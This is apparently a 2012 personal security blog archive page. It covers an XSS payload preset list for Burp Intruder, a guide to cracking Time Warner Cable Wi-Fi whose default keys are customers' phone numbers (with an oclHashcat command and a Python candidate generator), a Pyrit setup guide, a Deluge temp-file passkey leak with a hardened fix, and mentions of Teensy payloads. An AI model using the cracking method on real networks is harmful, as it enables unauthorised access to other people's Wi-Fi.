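            found['md5crypt'][m.group(0)] += 1
        for m in JTR_NT_RE.finditer(line):
            found['ntlm'][m.group(1).lower()] += 1
        line = JTR_NT_RE.sub('', line)          # do not file the same NT hash under md5/ntlm too
        for m in HEX_RE.finditer(line):
            kind = HEX_LENGTHS.get(len(m.group(0)))
            if kind:
                found[kind][m.group(0).lower()] += 1
    return found


def write_lists(found, prefix='all-'):
    """Mirror the post's output files: one sorted, de-duplicated list per kind."""
    names = []
    for kind, counter in found.items():
        name = prefix + kind.replace('/', '-')
        with open(name, 'w') as fh:
            fh.write('\n'.join(sorted(counter)) + '\n')
        names.append(name)
    return names


if __name__ == '__main__':
    for kind, counter in sorted(find_hashes(SAMPLE.splitlines()).items()):
        for digest, n in counter.most_common():
            print('%-9s x%d  %s' % (kind, n, digest))
```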

XSS! Burp intruder preset list. [alert and prompt]

Friday, June 29, 2012

Cross-site scripting preset list for Burp Suite.

Download the file: http://pastie.org/4160616 You can just save it as a .txt file and load it in Intruder as a preset list. The file includes alert and prompt payloads; prompt helps when alert has been filtered.

If you don't know how to use Burp, here is a pretty good tutorial.

Cracking Time Warner Cable Default WPA

Tuesday, June 26, 2012

In the Texas area I have noticed that all Time Warner Cable wireless access points are set up with the home owner's home phone number as the key. 

When I say all, I really mean the 3 I have run across, but that is close enough for me. 

Using http://www.telcodata.us/ I collected data for all phone number blocks in Texas that belong to Time Warner and cleaned the file up with a quick and dirty Python program: TimeWarnerNum.dict 

First you need to collect the 4-way handshake.

Then use oclHashcat-plus to crack the WPA1/2 password. This is tuned for my AMD graphics card; change the settings for your card. Note that -o is hashcat's output-file option, so the dictionary and the mask are given as positional arguments after the capture file: 

./oclHashcat-plus -m 2500 capture.hccap -a 6 TimeWarnerNum.dict ?d?d?d?d --output-format=6 --gpu-accel=32 --gpu-loops=256 --perm-min=10 --perm-max=10

This appends every possible four-digit combination to every number block Time Warner owns. Because the list also contains sub-blocks like 972-966-7, if you don't pin the length to 10 you will also create 11-digit numbers.
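An added example of mine (not the post's cleanup script) showing the keyspace arithmetic behind that hybrid attack: number blocks that extend a shorter block already in the list (972-966-7 inside 972-966) only duplicate work, so they are collapsed first, and each surviving block is padded with exactly the digits it is missing, which makes the length filter unnecessary. The prefixes are constructed and the names are mine.

```python
def clean_prefixes(raw, length=10):
    """Keep only digit strings shorter than the target length (the NPA-NXX or
    NPA-NXX-X blocks as they come out of the raw telcodata export)."""
    out = set()
    for item in raw:
        digits = ''.join(ch for ch in item if ch.isdigit())
        if 0 < len(digits) < length:
            out.add(digits)
    return out


def collapse_prefixes(prefixes):
    """Drop every prefix that extends a shorter one in the set: every number under
    9729667 is already under 972966, so keeping both would emit it twice."""
    kept = set()
    for p in sorted(set(prefixes), key=len):
        if not any(p.startswith(k) for k in kept):
            kept.add(p)
    return kept


def keyspace(prefixes, length=10):
    """Number of distinct candidates the collapsed list expands to."""
    return sum(10 ** (length - len(p)) for p in collapse_prefixes(prefixes))


def phone_numbers(prefixes, length=10):
    """Yield every `length`-digit number under the collapsed prefixes, in order:
    the same set hashcat's -a 6 attack with a ?d mask and a length filter covers,
    without generating and discarding the over-long ones."""
    for p in sorted(collapse_prefixes(prefixes)):
        pad = length - len(p)
        for i in range(10 ** pad):
            yield p + str(i).zfill(pad)


if __name__ == '__main__':
    raw = ['972-966', '972-966-7', '214-555-1', '(512) 555']   # constructed
    blocks = clean_prefixes(raw)
    print(sorted(collapse_prefixes(blocks)), keyspace(blocks), 'candidates')
    for n in list(phone_numbers(blocks))[:3]:
        print(n)
```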

HACKING WPA w/ PYRIT

Monday, June 25, 2012

Getting Pyrit to work with OpenCL and a PostgreSQL database, on Kubuntu 12.04 with an AMD Radeon HD 7950 card.


You have to install the AMD Catalyst drivers and the AMD APP SDK. Install whichever one is older first, then the newer one, so you don't corrupt your install. Which one that is will change, as the Catalyst drivers and the SDK are updated at different times. 


Go to AMD and download and install the drivers for your card. here  
This page will help you install your drivers. here


Restart after install.


Download the latest SDK. here
This page will help you install your SDK. here


Restart after install.


name@box$: env


Check and make sure you have the following:


AMDAPPSDKROOT=/opt/AMDAPP/
LD_LIBRARY_PATH=/opt/AMDAPP/lib


Make sure everything is running correctly and the driver is loaded by running the following. This has to be run as a normal user; the application doesn't work as root.
name@box$: fglrxinfo




Some dependencies that I ran into. This list may not be complete. 

apt-get install cmake libroot-python-dev libboost1.40-all-dev subversion libpcap-dev libssl-dev python-dev zlib1g-dev python-scapy libpcap0.8-dev libpq-dev 


Install the easy_install function. Follow the steps here.
Now you can run:


name@box$: sudo easy_install SQLAlchemy
name@box$: sudo easy_install psycopg2



Now we are ready to install pyrit.


name@box$: wget https://pyrit.googlecode.com/files/pyrit-0.4.0.tar.gz
name@box$: wget https://pyrit.googlecode.com/files/cpyrit-opencl-0.4.0.tar.gz


name@box$ tar xvzf pyrit-0.4.0.tar.gz
name@box$ tar xvzf cpyrit-opencl-0.4.0.tar.gz


name@box$ cd pyrit-0.4.0
name@box$ sudo python setup.py build
name@box$ sudo python setup.py install


name@box$ cd ../cpyrit-opencl-0.4.0
name@box$ nano setup.py


You need to edit the setup.py file so the OpenCL section matches the below (it picks up the SDK location from the AMDAPPSDKROOT variable checked earlier; the for loop continues as in the original file):


LIBRARIES.append('OpenCL')
try:
    if os.path.exists(os.environ['AMDAPPSDKROOT']):
        OPENCL_INC_DIRS.append(os.path.join(os.environ['AMDAPPSDKROOT'], 'include'))
        for path in ('lib/x86_64', 'lib/x86'):
            if os.path.exists(os.path.join(os.environ['AMDAPPSDKROOT'], path)):
                OPENCL_LIB_DIRS.append(os.path.join(os.environ['AMDAPPSDKROOT'], path))
                break
except:
    pass
for path in ('/opt/AMDAPP/include', \
             '/opt/AMDAPP/include/CL'):


ctrl+o to save
ctrl+x to exit


name@box$ sudo python setup.py build
name@box$ sudo python setup.py install




Install PostgreSQL 9 from the website.
Install pgadmin3 from the Ubuntu Software Center.


Set up a new user and database. 
User: 2wire 
Password: putitinme  
Database: 2wireDB


To have pyrit connect to your database do the following
name@box$ pyrit -u postgresql://2wire:putitinme@127.0.0.1/2wireDB [pyrit command]


Now if you don't want to type out all that nonsense each time, edit the following file:


name@box$ nano ~/.pyrit/config


Change where it says file:// to read postgresql://2wire:putitinme@127.0.0.1/2wireDB

Keep in mind the database password then sits in plain text in that file (and, with -u, on the command line where ps shows it to every user on the box), so keep the file's permissions tight (chmod 600) and don't reuse a password you care about.


Ctrl+o to save
Ctrl+x to exit


Now you can simply run pyrit:


name@box$ pyrit [pyrit command]


Now it will automatically connect to the database. 


I might have left out a few steps; if you run across this page and need some help feel free to hit me up. I know pages just like this one helped me install pyrit.

Speed Test Linux CLI

Friday, June 8, 2012

Quick way to get a decent speed test on the command line (curl shows the transfer rate while it downloads a 1 GB file to nowhere):


#!/bin/bash
curl -o /dev/null http://download.thinkbroadband.com/1GB.zip

Silly Seedboxes

Tuesday, June 5, 2012

Just got a seedbox and snooped around a little to make sure everything was set up right before I started to use it.

Noticed that it was storing all the .torrent files in the /tmp/ directory. I cat'ed a few of them and, sure enough, there were the passkeys (the per-user hash in the tracker announce URL) of all the users on that box. It was a problem in Deluge.

file: json_api.py
Line: tmp_file = os.path.join(tempfile.gettempdir(), url.split("/")[-1])


Patch submitted by the admin I brought it up to: http://dev.deluge-torrent.org/attachment/ticket/2112/json_api_patch.diff
http://dev.deluge-torrent.org/ticket/2112


This is bad because you are not supposed to leak your passkey to other people: whoever holds it can download under the other person's identity. It can also create lots of other problems I won't get into.
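The line quoted above beside a hardened version, as an added example of mine (this is not the Deluge patch linked in the post): the original builds a predictable file name in the shared temp directory and creates it with the process umask, so every other account on the box can read it; mkstemp() instead creates a file with an unpredictable name, atomically and with mode 0600, and the caller removes it when done. The torrent bytes are a constructed placeholder and the function names are mine.

```python
import os
import stat
import tempfile


def vulnerable_tmp_path(url):
    """The pattern from json_api.py: predictable name, world-shared directory,
    default-umask permissions. Anyone on the box can guess and read the file
    (and the passkey in its announce URL)."""
    return os.path.join(tempfile.gettempdir(), url.split("/")[-1])


def save_torrent_private(data, suffix=".torrent"):
    """Hardened form: mkstemp() opens the file O_EXCL with mode 0600 under a
    random name, so nobody else can read it or pre-create a file at that path."""
    fd, path = tempfile.mkstemp(suffix=suffix)
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(data)
    except Exception:
        os.unlink(path)
        raise
    return path


def is_private(path):
    """True if group and others have no permission bits at all on the file."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return mode & (stat.S_IRWXG | stat.S_IRWXO) == 0


def handle_torrent(data):
    """Write, inspect, and always remove the file; returns
    (was_private, still_exists_afterwards)."""
    path = save_torrent_private(data)
    try:
        private = is_private(path)
    finally:
        os.unlink(path)
    return private, os.path.exists(path)


if __name__ == '__main__':
    # constructed placeholder; a real file would be bencoded with the announce URL inside
    sample = b"d8:announce44:http://tracker.example/announce?passkey=...e"
    print("predictable path:", vulnerable_tmp_path("http://tracker.example/dl/abc.torrent"))
    print("private, left behind:", handle_torrent(sample))
```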

cmyip

EDIT: They changed the way the numbers are encoded. See the updated post: http://blog.init6.me/2012/11/update-cmyip.html


Just a little script that echoes back your current public IP address. Nice for when you are on a terminal and don't want to fire up a text browser, etc.

#!/bin/bash
ip_addr=$(curl -s http://cmyip.com | grep -o -E '[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}')
echo "$ip_addr"

Teensy Code Update

Friday, February 17, 2012

New Teensy code: 
Exploit/payload:
En/Decode base64.vbs
BSOD.hta


This new code just writes the payload out to the command prompt after you type memexe, so you don't have to write the file to the filesystem before passing it to memexe, which speeds things up.

Zeus Petting Farm

Tuesday, February 14, 2012

My Zeus slides from the DC214 presentation.